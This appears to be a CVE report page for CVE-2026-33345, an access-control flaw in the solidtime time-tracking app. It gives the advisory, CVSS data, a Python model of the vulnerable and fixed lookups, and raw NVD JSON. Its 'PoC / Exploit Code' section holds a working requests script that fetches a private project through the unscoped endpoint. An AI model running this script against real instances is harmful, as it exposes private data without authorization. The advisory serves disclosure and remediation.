Security Vulnerability Report
CVE-2026-33345 CVSS 6.5 MEDIUM

CVE-2026-33345

Published: 2026-03-24 20:16:29
Last Modified: 2026-03-26 13:21:22

Description

solidtime is an open-source time-tracking app. Prior to version 0.11.6, the project detail endpoint GET /api/v1/organizations/{org}/projects/{project} allows any authenticated Employee to access any project in the organization by UUID, including private projects they are not a member of. The index() endpoint correctly applies the visibleByEmployee() scope, but show() does not. This issue has been patched in version 0.11.6.
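The defect is a classic CWE-639 pattern: the list endpoint filters by what the caller may see, but the detail endpoint resolves the UUID with only the organization check, so knowing (or guessing) a UUID is enough to read a private project. The following model, added here and not taken from solidtime's code base (solidtime itself is a PHP/Laravel application), reproduces that gap in plain Python with constructed data: a `visible_by_employee` filter standing in for the `visibleByEmployee()` scope, a `show_vulnerable` lookup that skips it, and a `show_fixed` lookup that reuses it. The visibility rule (public projects, plus private projects the employee is a member of) is an assumption derived from the advisory text, not a statement about solidtime's implementation.

```python
"""Toy model of CVE-2026-33345's root cause: an object lookup that applies
the organization scope but not the visibility scope. Constructed data and
names; this is not solidtime's code (solidtime is a PHP/Laravel app)."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Employee:
    id: str
    organization_id: str


@dataclass
class Project:
    id: str                      # UUID string, as used in the URL path
    organization_id: str
    is_private: bool
    member_ids: frozenset = field(default_factory=frozenset)


def visible_by_employee(projects, employee):
    """Stand-in for the index() scope: same organization, and either a public
    project or a private project the employee is a member of. (Rule assumed
    from the advisory, which says private projects leak to non-members.)"""
    return [
        p for p in projects
        if p.organization_id == employee.organization_id
        and (not p.is_private or employee.id in p.member_ids)
    ]


def show_vulnerable(projects, employee, project_id):
    """Pre-0.11.6 show(): the UUID is resolved within the organization only,
    so any Employee who knows a private project's UUID can read it."""
    return next(
        (p for p in projects
         if p.organization_id == employee.organization_id and p.id == project_id),
        None,  # not found
    )


def show_fixed(projects, employee, project_id):
    """Patched show(): resolve the UUID through the same filter index() uses,
    so a private project the employee is not a member of is simply not found."""
    return next(
        (p for p in visible_by_employee(projects, employee) if p.id == project_id),
        None,
    )


# Constructed fixture: one organization with a public project and a private
# project whose only member is bob; alice is an Employee of the same
# organization but not a member of the private project.
ORG = "org-1"
PUBLIC_ID = "11111111-1111-4111-8111-111111111111"
PRIVATE_ID = "22222222-2222-4222-8222-222222222222"
PROJECTS = [
    Project(PUBLIC_ID, ORG, is_private=False),
    Project(PRIVATE_ID, ORG, is_private=True, member_ids=frozenset({"bob"})),
]
ALICE = Employee("alice", ORG)
BOB = Employee("bob", ORG)
OUTSIDER = Employee("carol", "org-2")  # different organization


def run_checks():
    """Return, per variant, whether the caller can read the given project."""
    return {
        "index_alice": [p.id for p in visible_by_employee(PROJECTS, ALICE)],
        "vuln_show_private_alice": show_vulnerable(PROJECTS, ALICE, PRIVATE_ID) is not None,
        "fixed_show_private_alice": show_fixed(PROJECTS, ALICE, PRIVATE_ID) is not None,
        "fixed_show_private_bob": show_fixed(PROJECTS, BOB, PRIVATE_ID) is not None,
        "fixed_show_public_alice": show_fixed(PROJECTS, ALICE, PUBLIC_ID) is not None,
        "fixed_show_private_outsider": show_fixed(PROJECTS, OUTSIDER, PRIVATE_ID) is not None,
    }


if __name__ == "__main__":
    for name, value in run_checks().items():
        print(f"{name}: {value}")
```

The point of `show_fixed` is that it does not add a second, parallel permission check; it resolves the object through the same filter the index uses. Keeping one visibility rule that every lookup path goes through is what prevents the index/show drift this CVE describes.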

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:solidtime:solidtime:*:*:*:*:*:*:*:* - VULNERABLE
solidtime < 0.11.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration (use only against an instance you are authorized to test)
TARGET_URL = "https://target-solidtime-instance.com"
ORG_ID = "target-org-id"
# Must be a PRIVATE project the authenticated Employee is NOT a member of;
# a 200 on a public project proves nothing.
TARGET_PROJECT_UUID = "uuid-of-private-project"
SESSION_COOKIE = "valid_session_cookie_value"  # session of a low-privilege Employee

# Headers: the requester is an ordinary authenticated Employee of ORG_ID
headers = {
    "Cookie": f"solidtime_session={SESSION_COOKIE}",
    "Accept": "application/json",
    "User-Agent": "CVE-2026-33345-POC",
}

# Vulnerable endpoint: before 0.11.6, show() resolves the project by UUID
# within the organization without applying the visibleByEmployee() scope,
# so a private project the Employee is not a member of is still returned.
vuln_endpoint = f"{TARGET_URL}/api/v1/organizations/{ORG_ID}/projects/{TARGET_PROJECT_UUID}"

try:
    response = requests.get(vuln_endpoint, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit Successful! Leaked Project Data:")
        print(response.json())
    elif response.status_code in (403, 404):
        # A scoped lookup hides the project from non-members; depending on
        # how the failure is surfaced this appears as 403 or 404.
        print(f"[-] Access denied ({response.status_code}). Vulnerability might be patched.")
    else:
        print(f"[!] Unexpected status code: {response.status_code}")
        print(response.text)
except requests.RequestException as e:
    print(f"[!] Error occurred: {e}")

References

https://github.com/solidtime-io/solidtime/commit/192c8c3b887aab34117b983c687934ca7c305209 (Patch)
https://github.com/solidtime-io/solidtime/releases/tag/v0.11.6 (Product, Release Notes)
https://github.com/solidtime-io/solidtime/security/advisories/GHSA-354j-rx28-jjxm (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33345", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.073", "lastModified": "2026-03-26T13:21:21.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "solidtime is an open-source time-tracking app. Prior to version 0.11.6, the project detail endpoint GET /api/v1/organizations/{org}/projects/{project} allows any authenticated Employee to access any project in the organization by UUID, including private projects they are not a member of. The index() endpoint correctly applies the visibleByEmployee() scope, but show() does not. This issue has been patched in version 0.11.6."}, {"lang": "es", "value": "solidtime es una aplicación de seguimiento de tiempo de código abierto. Antes de la versión 0.11.6, el endpoint de detalles del proyecto GET /API/v1/organizations/{org}/projects/{project} permite a cualquier Empleado autenticado acceder a cualquier proyecto en la organización por UUID, incluyendo proyectos privados de los que no son miembros. El endpoint index() aplica correctamente el ámbito visibleByEmployee(), pero show() no lo hace. Este problema ha sido parcheado en la versión 0.11.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:solidtime:solidtime:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.6", "matchCriteriaId": "5F39EBFF-0C6A-407E-9FAC-7B184603B064"}]}]}], "references": [{"url": "https://github.com/solidtime-io/solidtime/commit/192c8c3b887aab34117b983c687934ca7c305209", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/solidtime-io/solidtime/releases/tag/v0.11.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/solidtime-io/solidtime/security/advisories/GHSA-354j-rx28-jjxm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}